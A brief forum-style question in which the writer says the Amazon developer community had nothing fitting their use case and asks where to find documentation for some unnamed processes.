I looked on the Amazon dev community, but nothing there seemed to fit my use case.

I am struggling to find the documentation for these processes. Can anyone point me in the right direction?